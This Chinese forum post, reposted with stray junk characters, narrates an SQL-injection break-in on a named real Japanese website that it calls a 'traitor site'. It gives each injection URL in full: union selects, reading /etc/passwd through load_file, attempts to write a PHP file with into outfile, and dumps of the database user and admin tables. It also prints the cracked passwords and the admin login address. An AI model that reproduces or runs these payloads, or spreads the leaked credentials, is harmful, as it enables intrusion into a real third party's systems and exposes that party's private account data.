原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

: I# ?! e- {8 y1 _  j' F2 P
0x01. 检测 www.zuaa.jp 收集数据

5 C8 }: [! }' D6 X0 v
whatweb
9 U/ a; `+ y( l4 k* L0 {! k
0 I5 s# \, Z* T6 J/ j
利用NMAP扫描
# p0 v* w" @6 n2 r* T: |
' [$ y; d( |% J  \. ]中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! j1 y+ {* R( `- u/ V$ @0 P0x02.找注入点
) x9 \) I* X: B- O- n  B/ [* K8 A找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
5 F2 j! b' Q4 w; n, Q& J* X  n; d5 e3 H) }

/ a- h- u4 E& N; v2 g0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常

0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

% s- [  ?; c$ b0 I中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# a# J1 a4 B, A8 G% }
0x05. info:
* w+ v3 o/ r( U. S, S( U: l$ V5 ]http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

# p+ q4 k) B, huser:            root@localhost
database:    openpne
: \# z$ |# Q  v7 B4 E4 {version:      4.1.22
os:             portbld-freebsd5.4
" Q4 c" J3 z# m9 u4 S/ Z) w
4 U% R0 k: F) s2 G- L4 n0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
. N# o! W/ _+ ?) S0 ~3 m3 @4 h
7 C& q: p. M! I0 A通过工具转换
8 V* E# B! q1 Q6 c
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
& U4 r3 ]1 W- b: z
1 H+ L( |+ Y7 k) J8 {6 n# y0x07. 利用 into outfile
% D: W5 d: M; o! ~  l" l全部都失败
# r0 o) K) @  {& P( g6 \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
/ O! ]( P- @9 Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

0 q1 A. S7 |- }/ ^7 z/ K0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
& K0 W, ~! b  g. a+ E8 ~& T中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
5 x+ K0 P6 z- O


6 X6 V. Y8 q! b0 n! t1 F+ Y  R3 M0x09. 查找后台
0 R9 B, p$ \. O: F! e" k  I* \( D4 b利用 现有的各种 后台工具尝试都不行
2 [0 H& G- S$ h' U0 o  @1 D! h
  S8 [5 B, D5 G& _4 @3 |0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
- W3 ^( V8 W& t% a/ y, e可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
2 @; \) h4 L2 l' H+ Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
/ R/ G* d' A- o" c+ x: P
- h  r3 K; G. Q1 G4 B这个可以在 www.cmd5.com 解密
1 Y: V1 k( O; K0 D; z, x! [root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
, M9 d: _6 r$ \. vchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
4 a. h- g* `' kzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
2 J" r. G+ G' P& {7 a1 `8 _

0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
% F8 I; k" W& Z' t( U. a

0 _$ }- j9 Z! {0x12. 默认信息利用
5 w) I0 e+ e% y0 K# m2 u5 I" fhttp://sns.zuaa.jp/?m=admin&a=page_login

( W+ ]+ Y/ J# O' v表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
& n7 F: {7 J! D: W5 j
" |  A0 P+ f  Z/ l  E, u0 v6 q解密
4 R6 h) a* q9 i3 dzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
/ ?2 r8 f) Z$ R8 |+ Mzuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
& e: u3 R; O7 j( Q
4 G; ~0 K% L1 ?: b6 K8 {4 L2 l
" ~  x1 w) X2 Q0 x! ~7 A
0x14. 小结
! @5 w1 r8 [, ?1 A利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
3 Y! N* Y+ Q* I------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的